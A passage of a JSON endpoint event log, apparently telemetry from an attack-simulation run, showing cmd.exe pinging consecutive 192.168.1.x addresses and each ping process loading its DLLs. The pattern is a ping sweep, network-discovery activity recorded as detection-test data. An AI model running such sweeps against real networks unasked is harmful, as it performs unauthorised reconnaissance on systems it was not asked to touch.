131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "process", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573051830000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.217", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6556, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "process", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573056830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.218", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3944, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573056970000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573056980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "event_type": "process", - "pid": 3944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573061830000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-0010D7AE5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.219", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573061980000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "event_type": "process", - "pid": 4184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573066990000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-001037B35301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.220", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1376, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573067130000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067140000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067300000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067300000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573067300000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "event_type": "process", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573071830000, - "unique_pid": "{42FC7E13-CBBA-5C05-0000-0010A7B55301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.221", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6080, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573071980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "event_type": "process", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573076840000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001027B85301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.222", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6392, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573076980000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573076990000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "event_type": "process", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573081830000, - "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" - }, - { - "command_line": "ping -n 1 -w 100 